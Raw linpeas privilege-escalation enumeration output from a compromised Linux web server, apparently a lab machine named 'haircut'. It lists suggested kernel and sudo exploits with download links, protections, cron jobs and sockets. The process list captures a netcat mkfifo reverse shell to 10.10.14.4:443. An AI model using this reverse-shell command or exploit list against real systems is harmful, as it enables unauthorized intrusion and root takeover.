╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed                                                                            
dmesg Not Found                                                                          
                                                                                         
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester                                       
cat: write error: Broken pipe                                                            
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: highly probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2017-7308] af_packet

   Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
   Exposure: probable
   Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels

[+] [CVE-2017-6074] dccp

   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: probable
   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2017-1000112] NETIF_F_UFO

   Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
   Exposure: probable
   Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
   Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels

[+] [CVE-2016-8655] chocobo_root

   Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
   Exposure: probable
   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
   Download URL: https://www.exploit-db.com/download/40871
   Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled

[+] [CVE-2016-4557] double-fdput()

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
   Exposure: probable
   Tags: [ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2016-1247] nginxed-root.sh

   Details: https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
   Exposure: probable
   Tags: debian=8,[ ubuntu=14.04|16.04|16.10 ]
   Download URL: https://legalhackers.com/exploits/CVE-2016-1247/nginxed-root.sh
   Comments: Rooting depends on cron.daily (up to 24h of delay). Affected: deb8: <1.6.2; 14.04: <1.4.6; 16.04: 1.10.0; gentoo: <1.10.2-r3

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-18634] sudo pwfeedback

   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2018-1000001] RationalLove

   Details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
   Exposure: less probable
   Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
   Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
   Comments: kernel.unprivileged_userns_clone=1 required

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64

   Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   Exposure: less probable
   Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
   Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
   Comments: Uses "Stack Clash" technique, works against most SUID-root binaries

[+] [CVE-2017-1000253] PIE_stack_corruption

   Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
   Exposure: less probable
   Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
   Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c

[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE

   Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
   Exposure: less probable
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
   Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only

[+] [CVE-2016-2384] usb-midi

   Details: https://xairy.github.io/blog/2016/cve-2016-2384
   Exposure: less probable
   Tags: ubuntu=14.04,fedora=22
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
   Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user

[+] [CVE-2016-0728] keyring

   Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/40003
   Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working


╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2                                  
  [1] af_packet                                                                          
      CVE-2016-8655
      Source: http://www.exploit-db.com/exploits/40871
  [2] exploit_x
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [3] get_rekt
      CVE-2017-16695
      Source: http://www.exploit-db.com/exploits/45010


╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ AppArmor profile? .............. unconfined
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found                                 
═╣ PaX bins present? .............. PaX Not Found                                        
═╣ Execshield enabled? ............ Execshield Not Found                                 
═╣ SELinux enabled? ............... sestatus Not Found                                   
═╣ Seccomp enabled? ............... disabled                                             
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... disabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)                                         

                                   ╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════      
                                   ╚═══════════╝                                         
╔══════════╣ Container related tools present (if any):
/usr/bin/lxc                                                                             
╔══════════╣ Am I Containered?
╔══════════╣ Container details                                                           
═╣ Is this a container? ........... No                                                   
═╣ Any running containers? ........ No                                                   
                                                                                         

                                     ╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════      
                                     ╚═══════╝                                           
═╣ Google Cloud Platform? ............... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM? ............................ No
═╣ Azure APP? ........................... No



                ╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════       
                ╚════════════════════════════════════════════════╝                       
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes                                                       
root         1  0.0  0.2  37744  5792 ?        Ss   09:16   0:02 /sbin/init              
root       449  0.0  0.1  29648  2692 ?        Ss   09:17   0:00 /lib/systemd/systemd-journald
root       484  0.0  0.0  94772  1516 ?        Ss   09:17   0:00 /sbin/lvmetad -f
root       511  0.0  0.2  44700  4188 ?        Ss   09:17   0:00 /lib/systemd/systemd-udevd                                                                                       
systemd+   570  0.0  0.1 100324  2568 ?        Ssl  09:17   0:00 /lib/systemd/systemd-timesyncd
  └─(Caps) 0x0000000002000000=cap_sys_time
root       987  0.0  0.0   5224   156 ?        Ss   09:17   0:00 /sbin/iscsid
root       988  0.0  0.1   5724  3512 ?        S<Ls 09:17   0:00 /sbin/iscsid
root      1006  0.0  0.3 275868  6232 ?        Ssl  09:17   0:00 /usr/lib/accountsservice/accounts-daemon[0m
root      1025  0.1  0.4 192108 10228 ?        Ssl  09:17   0:04 /usr/bin/vmtoolsd
root      1030  0.0  0.2  65520  6132 ?        Ss   09:17   0:00 /usr/sbin/sshd -D
root      1033  0.0  0.0  20100  1280 ?        Ss   09:17   0:00 /lib/systemd/systemd-logind
message+  1038  0.0  0.1  42900  3864 ?        Ss   09:17   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
  └─(Caps) 0x0000000020000000=cap_audit_write
daemon[0m    1076  0.0  0.1  26044  2120 ?        Ss   09:17   0:00 /usr/sbin/atd -f
root      1080  0.0  0.3 629388  6228 ?        Ssl  09:17   0:00 /usr/bin/lxcfs /var/lib/lxcfs/
root      1084  0.0  0.1  29008  3008 ?        Ss   09:17   0:00 /usr/sbin/cron -f
root      1091  0.0  0.0   4400  1276 ?        Ss   09:17   0:00 /usr/sbin/acpid
syslog    1092  0.0  0.1 256396  3472 ?        Ssl  09:17   0:00 /usr/sbin/rsyslogd -n
root      1101  0.0  1.1 340880 23780 ?        Ssl  09:17   0:00 /usr/lib/snapd/snapd
mysql     1116  0.0  7.7 1115840 158912 ?      Ssl  09:17   0:02 /usr/sbin/mysqld
root      1168  0.0  0.2 277180  6100 ?        Ssl  09:17   0:00 /usr/lib/policykit-1/polkitd --no-debug
root      1184  0.0  0.0  15940  1716 tty1     Ss+  09:17   0:00 /sbin/agetty --noclear tty1 linux
root      1197  0.0  0.0  13376   168 ?        Ss   09:17   0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root      1210  0.0  0.0 125112  1464 ?        Ss   09:17   0:00 nginx: master process /usr/sbin/nginx -g daemon[0m on; master_process on;
www-data  1214  0.2  0.2 125712  5104 ?        S    09:17   0:13  _ nginx: worker process
root      1220  0.0  1.2 221516 25084 ?        Ss   09:17   0:00 php-fpm: master process (/etc/php/7.0/fpm/php-fpm.conf)
www-data  1223  0.0  0.5 221736 10784 ?        S    09:17   0:00  _ php-fpm: pool www
www-data  1224  0.0  0.5 221736 10452 ?        S    09:17   0:00  _ php-fpm: pool www
www-data  4096  0.0  0.0   4508   744 ?        S    10:18   0:00  |   _ sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.4 443 >/tmp/f
www-data  4099  0.0  0.0   4536   668 ?        S    10:18   0:00  |       _ cat /tmp/f
www-data  4100  0.0  0.0   4508   844 ?        S    10:18   0:00  |       _ sh -i
www-data  4103  0.0  0.4  35836  8392 ?        S    10:18   0:00  |       |   _ python3 -c import pty;pty.spawn("/bin/bash")
www-data  4104  0.0  0.1  18220  3272 pts/0    Ss   10:18   0:00  |       |       _ /bin/bash
www-data  4136  0.2  0.1   5452  2592 pts/0    S+   10:34   0:00  |       |           _ /bin/sh ./linpeas.sh
www-data  8793  0.0  0.0   5452  1048 pts/0    S+   10:34   0:00  |       |               _ /bin/sh ./linpeas.sh
www-data  8797  0.0  0.1  34556  3052 pts/0    R+   10:34   0:00  |       |               |   _ ps fauxwww
www-data  8796  0.0  0.0   5452  1048 pts/0    S+   10:34   0:00  |       |               _ /bin/sh ./linpeas.sh
www-data  4101  0.0  0.0   6496  1812 ?        S    10:18   0:00  |       _ nc 10.10.14.4 443
www-data  4024  0.0  0.4 221736  9864 ?        S    09:57   0:00  _ php-fpm: pool www

╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)                                                                                     
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes             
                                                                                         
╔══════════╣ Processes whose PPID belongs to a different user (not root)
╚ You will know if a user can somehow spawn processes as a different user                
Proc 570 with ppid 1 is run by user systemd-timesync but the ppid user is root           
Proc 1038 with ppid 1 is run by user messagebus but the ppid user is root
Proc 1076 with ppid 1 is run by user daemon but the ppid user is root
Proc 1092 with ppid 1 is run by user syslog but the ppid user is root
Proc 1116 with ppid 1 is run by user mysql but the ppid user is root
Proc 1214 with ppid 1210 is run by user www-data but the ppid user is root
Proc 1223 with ppid 1220 is run by user www-data but the ppid user is root
Proc 1224 with ppid 1220 is run by user www-data but the ppid user is root
Proc 4024 with ppid 1220 is run by user www-data but the ppid user is root

╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information                                                                                
COMMAND     PID  TID             USER   FD      TYPE             DEVICE SIZE/OFF   NODE NAME

╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory                                                                                
gdm-password Not Found                                                                   
gnome-keyring-daemon Not Found                                                           
lightdm Not Found                                                                        
vsftpd Not Found                                                                         
apache2 Not Found                                                                        
sshd Not Found                                                                           
                                                                                         
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs   
/usr/bin/crontab                                                                         
incrontab Not Found
-rw-r--r-- 1 root root     722 Apr  5  2016 /etc/crontab                                 

/etc/cron.d:
total 28
drwxr-xr-x   2 root root 4096 May 16  2017 .
drwxr-xr-x 109 root root 4096 Jul 13  2021 ..
-rw-r--r--   1 root root  102 Apr  5  2016 .placeholder
-rw-r--r--   1 root root  244 Dec 29  2014 anacron
-rw-r--r--   1 root root  589 Jul 16  2014 mdadm
-rw-r--r--   1 root root  670 Mar  1  2016 php
-rw-r--r--   1 root root  190 May 15  2017 popularity-contest

/etc/cron.daily:
total 64
drwxr-xr-x   2 root root 4096 May 16  2017 .
drwxr-xr-x 109 root root 4096 Jul 13  2021 ..
-rw-r--r--   1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root  311 Dec 29  2014 0anacron
-rwxr-xr-x   1 root root  376 Mar 31  2016 apport
-rwxr-xr-x   1 root root 1474 Jan 17  2017 apt-compat
-rwxr-xr-x   1 root root  355 May 22  2012 bsdmainutils
-rwxr-xr-x   1 root root 1597 Nov 27  2015 dpkg
-rwxr-xr-x   1 root root  372 May  6  2015 logrotate
-rwxr-xr-x   1 root root 1293 Nov  6  2015 man-db
-rwxr-xr-x   1 root root  539 Jul 16  2014 mdadm
-rwxr-xr-x   1 root root  435 Nov 18  2014 mlocate
-rwxr-xr-x   1 root root  249 Nov 12  2015 passwd
-rwxr-xr-x   1 root root 3449 Feb 26  2016 popularity-contest
-rwxr-xr-x   1 root root  214 May 24  2016 update-notifier-common
-rwxr-xr-x   1 root root 1046 May 19  2016 upstart

/etc/cron.hourly:
total 12
drwxr-xr-x   2 root root 4096 May 15  2017 .
drwxr-xr-x 109 root root 4096 Jul 13  2021 ..
-rw-r--r--   1 root root  102 Apr  5  2016 .placeholder

/etc/cron.monthly:
total 16
drwxr-xr-x   2 root root 4096 May 16  2017 .
drwxr-xr-x 109 root root 4096 Jul 13  2021 ..
-rw-r--r--   1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root  313 Dec 29  2014 0anacron

/etc/cron.weekly:
total 28
drwxr-xr-x   2 root root 4096 May 16  2017 .
drwxr-xr-x 109 root root 4096 Jul 13  2021 ..
-rw-r--r--   1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root  312 Dec 29  2014 0anacron
-rwxr-xr-x   1 root root   86 Apr 13  2016 fstrim
-rwxr-xr-x   1 root root  771 Nov  6  2015 man-db
-rwxr-xr-x   1 root root  211 May 24  2016 update-notifier-common

/var/spool/anacron:
total 20
drwxr-xr-x 2 root root 4096 May 16  2017 .
drwxr-xr-x 5 root root 4096 May 16  2017 ..
-rw------- 1 root root    9 Jan  3 09:22 cron.daily
-rw------- 1 root root    9 Jan  3 09:32 cron.monthly
-rw------- 1 root root    9 Jan  3 09:27 cron.weekly

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )


SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
HOME=/root
LOGNAME=root

1       5       cron.daily      run-parts --report /etc/cron.daily
7       10      cron.weekly     run-parts --report /etc/cron.weekly
@monthly        15      cron.monthly    run-parts --report /etc/cron.monthly

╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths                                                                                    
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin                        

╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services              
/etc/systemd/system/final.target.wants/snapd.system-shutdown.service could be executing some relative path
/etc/systemd/system/multi-user.target.wants/networking.service could be executing some relative path
/etc/systemd/system/network-online.target.wants/networking.service could be executing some relative path
/etc/systemd/system/sysinit.target.wants/friendly-recovery.service could be executing some relative path
You can't write on systemd PATH

╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers                
NEXT                         LEFT        LAST                         PASSED       UNIT                         ACTIVATES
Thu 2024-01-04 02:26:25 CET  15h left    Wed 2024-01-03 09:17:07 CET  1h 17min ago apt-daily.timer              apt-daily.service                                                 
Thu 2024-01-04 09:31:55 CET  22h left    Wed 2024-01-03 09:31:55 CET  1h 2min ago  systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service                                    
Mon 2024-01-08 03:48:58 CET  4 days left Wed 2024-01-03 10:05:28 CET  29min ago    snapd.refresh.timer          snapd.refresh.service                                             
n/a                          n/a         n/a                          n/a          ureadahead-stop.timer        ureadahead-stop.service                                           

╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers                
                                                                                         
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets               
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request                                                                       
/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket                                                                                
/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket                                                           
/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log                                          
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout                                                   
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket                                                   
/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog                                                                                  
/lib/systemd/system/systemd-bus-proxyd.socket is calling this writable listener: /var/run/dbus/system_bus_socket                                                                  
/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log                                                               
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout                                                                        
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket                                                                        
/lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request

╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets               
/run/acpid.socket                                                                        
  └─(Read Write)
/run/dbus/system_bus_socket
  └─(Read Write)
/run/lvm/lvmetad.socket
/run/lvm/lvmpolld.socket
/run/mysqld/mysqld.sock
  └─(Read Write)
/run/php/php7.0-fpm.sock
  └─(Read Write)
/run/snapd-snap.socket
  └─(Read Write)
/run/snapd.socket
  └─(Read Write)
/run/systemd/fsck.progress
/run/systemd/journal/dev-log
  └─(Read Write)
/run/systemd/journal/socket
  └─(Read Write)
/run/systemd/journal/stdout
  └─(Read Write)
/run/systemd/journal/syslog
  └─(Read Write)
/run/systemd/notify
  └─(Read Write)
/run/systemd/private
  └─(Read Write)
/run/udev/control
/run/uuidd/request
  └─(Read Write)
/var/lib/lxd/unix.socket
/var/run/dbus/system_bus_socket
  └─(Read Write)
/var/run/mysqld/mysqld.sock
  └─(Read Write)

╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus                 
Possible weak user policy found on /etc/dbus-1/system.d/bluetooth.conf (  <policy group="bluetooth">
  <policy group="lp">)
Possible weak user policy found on /etc/dbus-1/system.d/dnsmasq.conf (        <policy user="dnsmasq">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.NetworkManager.conf (        <policy user="whoopsie">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.network1.conf (        <policy user="systemd-network">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.resolve1.conf (        <policy user="systemd-resolve">)
Possible weak user policy found on /etc/dbus-1/system.d/pulseaudio-system.conf (  <policy user="pulse">)
Possible weak user policy found on /etc/dbus-1/system.d/wpa_supplicant.conf (        <policy group="netdev">)

╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus                 
NAME                                 PID PROCESS         USER             CONNECTION    UNIT                      SESSION    DESCRIPTION        
:1.0                                   1 systemd         root             :1.0          init.scope                -          -                  
:1.1                                1033 systemd-logind  root             :1.1          systemd-logind.service    -          -                  
:1.10                              12140 busctl          www-data         :1.10         php7.0-fpm.service        -          -                  
:1.2                                1006 accounts-daemon[0m root             :1.2          accounts-daemon.service   -          -                  
:1.3                                1168 polkitd         root             :1.3          polkitd.service           -          -                  
com.ubuntu.LanguageSelector            - -               -                (activatable) -                         -         
com.ubuntu.SoftwareProperties          - -               -                (activatable) -                         -         
org.freedesktop.Accounts            1006 accounts-daemon[0m root             :1.2          accounts-daemon.service   -          -                  
org.freedesktop.DBus                1038 dbus-daemon[0m     messagebus       org.freedesktop.DBus dbus.service              -          -                                          
org.freedesktop.PolicyKit1          1168 polkitd         root             :1.3          polkitd.service           -          -                  
org.freedesktop.hostname1              - -               -                (activatable) -                         -         
org.freedesktop.locale1                - -               -                (activatable) -                         -         
org.freedesktop.login1              1033 systemd-logind  root             :1.1          systemd-logind.service    -          -                  
org.freedesktop.network1               - -               -                (activatable) -                         -         
org.freedesktop.resolve1               - -               -                (activatable) -                         -         
org.freedesktop.systemd1               1 systemd         root             :1.0          init.scope                -          -                  
org.freedesktop.timedate1              - -               -                (activatable) -                         -         


                              ╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════      
                              ╚═════════════════════╝                                    
╔══════════╣ Hostname, hosts and DNS
haircut                                                                                  
127.0.0.1       localhost
10.10.20.20     haircut

::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 8.8.8.8

╔══════════╣ Interfaces
default         0.0.0.0                                                                  
loopback        127.0.0.0
link-local      169.254.0.0
localnet        10.10.20.0
ens160    Link encap:Ethernet  HWaddr 00:50:56:b9:bf:f5  
          inet addr:10.10.10.24  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:bff5/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:bff5/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:885638 errors:0 dropped:0 overruns:0 frame:0
          TX packets:193175 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:76313349 (76.3 MB)  TX bytes:37981057 (37.9 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:230 errors:0 dropped:0 overruns:0 frame:0
          TX packets:230 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:20893 (20.8 KB)  TX bytes:20893 (20.8 KB)


╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports            
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1214/nginx: worker 
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      1214/nginx: worker 
tcp6       0      0 :::22                   :::*                    LISTEN      -               

╔══════════╣ Can I sniff with tcpdump?
No                                                                                       
                                                                                         


                               ╔═══════════════════╗
